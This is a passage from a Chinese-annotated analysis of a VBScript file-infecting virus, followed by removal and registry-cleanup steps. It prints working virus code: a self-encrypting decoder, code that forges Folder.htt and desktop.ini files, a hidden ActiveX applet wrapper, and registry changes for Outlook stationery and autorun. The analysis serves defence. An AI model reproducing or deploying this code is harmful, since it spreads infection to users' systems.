                If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then
                        HttExists = 1     '对当前路径是桌面或者桌面上的目录都不放过
                End If
                If HttExists = 0 Then ' 如果没有HTT文件存在,就伪造一个,不过是配对的2个文件
                        FSO.CopyFile WinPath & "system32\desktop.ini", PathName
                        FSO.CopyFile WinPath & "web\Folder.htt", PathName
                End If
End Function

Function KJSetDim()
        On Error Resume Next
        Err.Clear
        TestIt = WScript.ScriptFullname         ' 得到脚本文件的全名
        If Err Then
                InWhere = "html"                                ' 是HTML文件
        Else
                InWhere = "vbs"                                 ' 是VBS文件
        End If
        If InWhere = "vbs" Then                         ' 如果安装了 SCRIPT HOST就方便了许多
                Set FSO = CreateObject("Scripting.FileSystemObject")
                Set WsShell = CreateObject("WScript.Shell")
        Else                                                            ' 如果安装时没有选择 SCRIPT HOST 那么病毒就自己配置,看来WINDOWS没有按照用户的要求去做
                Set AppleObject = document.applets("KJ_guest") ' 通过KJ_guest向系统注册一个脚本解释器
                AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object
                AppleObject.createInstance()                                                               ' 使用SCRIPT HOST 来执行各种操作,这就是提倡大家安装98时,不要安装SCRIPT HOST的原因
                Set WsShell = AppleObject.GetObject()
                AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' 功能强大的 FileSystem Object
                AppleObject.createInstance()
                Set FSO = AppleObject.GetObject()
        End If
        Set DiskObject = FSO.Drives                                                                             ' 得到系统的硬盘和软盘驱动器
        For Each DiskTemp In DiskObject
                If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
                        Exit For                                                                                                        ' 如果不是硬盘或者软盘则不能感染
                End If
                FinalyDisk = DiskTemp.DriveLetter                                                               ' 系统中硬盘最后一个盘符
        Next
        Dim OtherArr(3)                                                                                                         ' 一个随机数组
        Randomize
        For i = 0 To 3
                OtherArr(i) = Int((9 * Rnd))                                                                    ' 从 0 到 9
        Next
        TempString = ""
        For i = 1 To Len(ThisText)                                                                                      ' 从1到病毒体的长度,看来下面是对病毒的解密部分
                TempNum = Asc(Mid(ThisText, i, 1))                                                              ' 取第I处的字符ASC值
                If TempNum = 13 Then                                                                                    ' 如果是13
                        TempNum = 28                                                                                            ' 强制替换为28
                ElseIf TempNum = 10 Then                                                                                ' 如果是10
                        TempNum = 29                                                                                            ' 强制替换为29
                End If
                TempChar = Chr(TempNum - OtherArr(i Mod 4))                                     ' I处的字符ASC码-I和4取余数
                If TempChar = Chr(34) Then                                                                              ' 如果等于34,则替换为18
                        TempChar = Chr(18)
                End If
                TempString = TempString & TempChar    ' 已经生成了伪装好的病毒代码字符串,完全随机的
        Next  ' 下一句比较烦
        UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document..write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XCom _
nent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
        'UnLockStr 就是执行病毒的字符串,下面是实际执行的内容
        '
        'Dim KeyArr(3),ThisText
        'KeyArr(0) = OtherArr(0)
        'KeyArr(1) = OtherArr(1)
        'KeyArr(2) = OtherArr(2)
        'KeyArr(3) = OtherArr(3)
        'For i=1 To Len(ExeString)
        '       TempNum = Asc(Mid(ExeString,i,1))
        '       If TempNum = 18 Then
        '               TempNum = 34
        '       End If
        '       TempChar = Chr(TempNum + KeyArr(i Mod 4))
        '       If TempChar = Chr(28) Then
        '               TempChar = vbCr
        '       ElseIf TempChar = Chr(29) Then
        '               TempChar = vbLf
        '       End If
        '       ThisText = ThisText & TempChar
        'Next 上面执行后,已经构造成功一个ThisText命令串
        '       "Execute(ThisText)   "   是一个字符串,网页中可以找到
        '       ThisText = "ExeString =  TempString 字符的内容" ,这里是为THISTEXT赋值
        '       HtmlText =
        '                       <script language=vbscript>
        '                               <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
        '                                       <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
        '                                       </APPLET>
        '                               </div>
        '                       </script>
        '                       <script language=vbscript>
        '                               ThisText     网页中可以找到的部分,就是   "ExeString=..."
        '                               UnLockStr       Execute("Dim KeyArr(3)...."
        '                       </script>
        '                       </BODY>
        '                       </HTML>
        'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
        WinPath = FSO.GetSpecialFolder(0) & "\"
        If (FSO.FileExists(WinPath & "web\Folder.htt")) Then    ' 更深层次的感染
                FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"
        End If                          '如果这个机器是WEB服务器,那么浏览过这个服务器的所有用户都将被感染
        If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
                FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"
        End If
End Function

' 有了以上分析,解毒的话就方便多了
' 解毒内容
' 1. 对于HTT文件
'       第一行是病毒的开始,应但删除   开始的0X24个BYTES应当删除
'       从文件结束倒退(0X5A0A-0X2D3C+1=)0X2CCF个BYTES应当删除
' 2. 对于HTML,ASP,PHP,JSP文件
'   从文件结尾倒退(0X5E4E-0X3153+1=)0X2CFC应当删除
' 3. 对于VBS文件
'   只要删除文件最后0X2B97+2(回车)个BYTES就可以了
' 4. 至于KERNEL.DLL,可以直接删除,为保险起见,也可以删除文件最后0X2B97个BYTES
' 5. 还有kjwall.gif,直接删除.
' 6. 要对修改过的注册表进行恢复
'               WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
'       Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
'               Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
'               WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
'               Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
'       Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
'               WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call
'               KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
'               WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
'               WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
'               WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
'               WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
'               WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
'               RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
' ****************************************************************
'       HKEY_CURRENT_USER\Identities\Default User ID  如果有SOFTWARE\等等的话,删除后面的SOFTWARE,其余的保留即可
'               HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference   键值清空即可
'               HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360    清空
'               HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360   清空
'               HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference  清空
'               HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery     清空
'               HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32                       清空
'               HKEY_CLASSES_ROOT\.dll                          删除.DLL及下面所有东西
'               HKEY_CLASSES_ROOT\dllfile\DefaultIcon\                  删除DLLFILE及下面所有东西
'               HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command
'               HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps
'               HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode
'               HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree            删除DEGREE及下面所有东西

本文地址:http://com.8s8s.com/it/it1998.htm